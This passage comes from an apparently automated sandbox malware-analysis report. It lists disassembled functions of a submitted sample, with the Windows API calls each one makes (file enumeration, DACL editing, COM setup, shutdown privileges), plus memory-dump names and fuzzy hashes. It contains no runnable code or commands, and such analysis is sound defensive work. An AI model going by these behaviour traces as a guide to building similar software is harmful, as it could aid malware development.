                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00434C4F
                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00434C65
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00434C77
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C88
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434C9C
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00434CB7
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00434CFE
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048A090), ref: 00434D22
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00434D2A
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D35
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00434D43
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 399dbb17912f16e5170155dcc5475d9346bc7ba5aa4a4c8a0ea4d4714b2c7a66
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a9fa3bdb603958be151e0ad833d8004315071fb05557dfda8e1c4e562a15c1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4141D8726042086BD710EF64DC45AEFB3A8AAC9311F14592FFD54C3280EB79E915C7B9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00444078 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94timesleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Timetime$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: BUTTON
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4176159691-3405671355
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00445DD3 Relevance: 18.2, APIs: 12, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004392DE
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004392BC: GetLastError.KERNEL32 ref: 004392E4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004392BC: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0043930B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0043928B: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004392A5
                                                                                                                                                                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00000004,?,?,?,?), ref: 00445E4B
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 00445E61
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00445E83
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00445E92
                                                                                                                                                                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?,?,00000018), ref: 00445EDE
                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00445EFB
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,?,00000018), ref: 00445F11
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?,?,00000000,?,00000000), ref: 00445F39
                                                                                                                                                                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00445F40
                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?,?,00000000,?,00000000), ref: 00445F6E
                                                                                                                                                                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000,?,00000000,?,00000000), ref: 00445F8B
                                                                                                                                                                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,?,?), ref: 00445FA0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3490752873-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0047AB7C
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0047ACCD
                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                                                                                                                                                                                                                                                                                                                • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1588287285-2785691316
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00436504
                                                                                                                                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                                                                                                                                                                                                                                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                                                                                                                                                                                                                                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00436162
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00436176
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                                                                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2406429042-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0047AE18
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                                                                                                                                                                                                                                                                                                                • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1915432386-2761332787
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
